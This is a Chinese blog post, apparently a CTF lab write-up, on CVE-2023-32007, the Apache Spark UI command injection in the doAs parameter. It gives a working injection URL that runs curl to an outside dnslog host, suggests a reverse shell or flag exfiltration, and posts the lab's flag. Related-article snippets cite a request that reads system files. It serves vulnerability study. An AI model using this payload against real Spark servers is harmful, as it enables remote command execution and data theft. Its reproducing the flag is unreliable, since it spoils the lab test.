【春秋云镜】CVE-2023-32007 Apache Spark UI 命令注入漏洞

最新推荐文章于 2024-04-30 12:40:04 发布
最新推荐文章于 2024-04-30 12:40:04 发布
阅读量179 收藏 1
点赞数 6
文章标签: spark 大数据 分布式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/RisingFan/article/details/137969298
版权

题目解析

Apache Spark UI 提供了通过配置选项 spark.acls.enable 启用 ACL 的可能性。使用身份验证过滤器,这会检查用户是否具有查看或修改应用程序的访问权限。如果启用了 ACL,则 HttpSecurityFilter 中的代码路径可以允许某人通过提供任意用户名来执行模拟。然后,恶意用户可能能够访问权限检查功能,该功能最终将根据他们的输入构建 Unix shell 命令并执行它。这将导致任意 shell 命令执行,因为用户 Spark 当前正在运行。此问题早先被披露为 CVE-2022-33891,但错误地声称版本 3.1.3(此后已停产)不会受到影响。此漏洞仅影响维护者不再支持的产品。建议用户升级到支持的 Apache Spark 版本,例如 3.4.0 版本。

漏洞复现

启动环境访问发现是502,原因是点击链接跳转地址中没有端口,查看路径端口为8080

那么直接带着端口8080访问即可

命令执行

使用curl命令探测到目标可以出网

http://eci-2ze4yv5qcgxy5fmq30cx.cloudeci1.ichunqiu.com:8080/jobs/?doAs=`curl http://w2s2ig.dnslog.cn`

 那就直接反弹shell或者带flag出来即可。

 flag最终值

flag{e1289663-3ad8-44db-abc4-d6006720528a}
RisingFan
关注
  • 6
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
Apache Spark远程代码执行漏洞(CVE-2023-32007)漏洞复现
失心少年
08-24 1022
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!Apache Spark 3.4.0之前版本存在命令注入漏洞,该漏洞源于如果ACL启用后,HttpSecurityFilter中的代码路径可以允许通过提供任意用户名来执行模拟,这将导致任意shell命令执行。
Apache Spark 命令注入CVE-2022-33891)格式化文档
08-10
Apache Spark 命令注入CVE-2022-33891)漏洞复现 CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1<Apache spark 版本 Apache Spark version>...
CVE-2022-33891:Apache Spark 命令注入漏洞通告
weixin_68057794的博客
08-08 1268
它还支持一组丰富的高级工具,包括用于 SQL 和 DataFrames 的 Spark SQL、用于 Pandas 工作负载的 Spark 上的 Pandas API、用于机器学习的 MLlib、用于图形处理的 GraphX 和用于流处理的结构化流。在进入doFilter函数之后,首先会提取参数“doAs”的值,然后赋值给effectiveUser,进入org.apache.spark.SecurityManager#checkUIViewPermissions函数。...
漏洞复现:Apache Spark 命令注入CVE-2022-33891)
qq_42660246的博客
07-20 6610
ApacheSparkUI可以设置选项spark.acls.enable启用ACL,使用身份验证过滤器。用以检查用户是否具有查看或修改应用程序的访问权限。如果启用了ACL则HttpSecurityFilter中的代码路径可以允许用户通过提供任意用户名来执行命令。该功能最终将根据用户输入构建一个Unixshell命令并执行它,最终导致任意命令执行。.........
Apache Spark UI 命令注入漏洞 CVE-2022-33891
合天网安学院
10-18 1215
Apache Spark UI 提供了通过配置选项 spark.acls.enable。 使用身份验证过滤器,这检查用户是否有访问权限来查看或修改应用。如果启用了 ACL,则 HttpSecurityFilter 中的代码路径可以允许某人通过提供任意用户名来执行模拟。
CVE-2022-33891POC Apache Spark 命令注入CVE-2022-33891)POC
08-10
Apache Spark 命令注入CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1<Apache spark 版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
Apache Spark UI 命令注入漏洞 [CVE-2022-33891].md
07-09
Apache Spark UI 命令注入漏洞 [CVE-2022-33891]
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
大数据面试题 —— Spark数据倾斜及其解决方案
hu_wei123的博客
04-27 1006
有的时候,我们可能会遇到大数据计算中一个最棘手的问题 ——数据倾斜,此时 Spark 作业的性能会比期望差很多。数据倾斜调优,就是使用各种技术方案解决不同类型的数据倾斜问题,以保证 Spark 作业的性能。
Spark 为什么比 Hive 快
JIE的博客
04-26 909
由于 MapReduce 的特性,Hive 在处理大规模数据时可能会出现较高的延迟,因为它需要频繁地将数据写入和读取磁盘,Shuffle 操作会导致花费的时间代价比较大。那么在稳定性方面,Hive 优于 Spark,这是因为在 MR 任务中,数据总是按照块分片进行处理,每块数据都可以独立地读取和处理,并不需要将所有数据都加载到内存中,因此它对内存的需求远低于Spark。由于 Spark 使用的是内存计算,在处理大规模的数据时,需要足够的内存资源,否则可能会发生 OOM 或者导致计算速度非常缓慢。
Apache Spark 的基本概念和在大数据分析中的应用
最新发布
longe20111104的博客
04-30 303
Spark提供了一系列的API和工具,包括Spark Core、Spark SQL、Spark Streaming、MLlib和GraphX等。RDD是一个具有容错性和可并行性的分布式数据集合,它可以在集群中的多个节点上进行并行操作。Spark提供了一个高级的编程接口,使得开发人员可以在一个统一的框架下处理不同类型的数据和任务。因为Spark能够将数据加载到内存中进行处理,所以它在大数据处理中具有较高的性能。Apache Spark是一个开源的大数据处理框架,它提供了高效的数据处理和分析能力。
10分钟了解数据质量管理-奥斯汀格里芬 Apache Griffin
搞数据
04-28 1071
Griffin是一个开源的大数据数据质量解决方案,由eBay开源,它支持批处理和流模式两种数据质量检测方式,是一个基于Hadoop和Spark建立的数据质量服务平台 (DQSP)。它提供了一个全面的框架来处理不同的任务,例如定义数据质量模型、执行数据质量测量、自动化数据分析和验证,以及跨多个数据系统的统一数据质量可视化。Griffin于2016年12月进入Apache孵化器,Apache软件基金会2018年12月12日正式宣布Apache Griffin毕业成为Apache顶级项目。
云计算知识点-02
lv785的博客
04-27 1482
DataNode是HDFS文件系统的工作节点,DataNode会按照客户端或者是NameNode的调度来存储和检索数据,并定期向NameNode发送它所存储的数据块列表,DataNode是文件系统中真正存储数据的地方。通过这种虚拟化可以减少服务器的数量,提高服务器的使用效率,可以在一定程度上摆脱物理上的空间限制,实现随时随地随需的自由掌控。Glance(镜像服务组件),其作用是:提供虚拟机镜像的存储,查询和检索功能,为nova进行服务,依赖于存储服务(存储镜像本身)和数据库服务(存储镜像相关的数据)。
踏上大数据第一步:flume
Hanko的专栏
04-29 591
Flume是一个分布式、可靠、可用的系统,用于高效地收集、聚合和移动大量日志数据。它旨在从不同的数据源收集数据,并将其存储到中央数据存储中,如HDFS、HBase或Solr等。Flume是Apache旗下的一个顶级项目,是Hadoop生态系统中的一个重要组件。日志收集Flume可以高效地从各种Web服务器、应用服务器等收集日志数据,并将其传输到HDFS或其他存储系统中,为后续的数据分析做准备。数据采集。
25计算机考研院校数据分析 | 电子科技大学
m0_72717598的博客
04-29 766
是国家“985工程”、“211工程”、“世界一流大学和一流学科”重点建设高校,入选“2011计划”、“111计划”、“卓越工程师教育培养计划”、“国家建设高水平大学公派研究生项目”、“中国政府奖学金来华留学生接收院校”,两电一邮成员。题库中抽取题目作答,重点考查程序设计、算法设计与分析、软件工程、计算机组成原理、数据库、计算机网络、编译原理、密码学(该科目限报考083900网络空间安全专业考生)等基础知识情况。101思想政治理论、201英语一、301数学一、820计算机专业基础【22数据结构+操作系统】
中国移动发布国内领先的大云磐石DPU芯片速率达400Gbps
csdnsqst0046的博客
04-30 108
后续,磐石DPU芯片将广泛应用于中国移动数据中心建设,以其优越性能,支撑通用计算、智能计算等业务场景使用,为云计算、边缘计算、大数据处理、AI大模型训练等领域提供更加安全、可靠、高效的技术支撑,助力我国大数据、人工智能、算力网络高速发展,推动算力强国战略落地。4月28日,中国移动在其2024算力网络大会上正式发布大云磐石DPU,该芯片带宽达到400Gbps,为国内领先水平,将应用于移动云新一代大云磐石DPU产品,实现关键技术自主可控。据介绍,DPU是一种专注于数据处理的处理器,可实现更高效的数据处理。
sonar启动报错
m0_53166211的博客
04-27 244
sonarqube启动报错
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark命令注入漏洞CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来修复这个漏洞,并提供了相关链接供参考。 另外,引用中还提供了一个链接,指向一个网址http://eci-2zej5zymcbcri9jmain3.cloudeci1.ichunqiu.com/,但无法确定这个链接与CVE-2022-0543之间的具体关系。 引用中还展示了一个尝试读取系统文件的HTTP请求,但同样无法确定这个请求与CVE-2022-0543之间的具体关系。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [CVE-2022-33891POCApache Spark 命令注入CVE-2022-33891)POC](https://download.csdn.net/download/qq_51577576/86396832)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [[春秋云镜]CVE-2022-0543](https://blog.csdn.net/niubi707/article/details/128305838)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值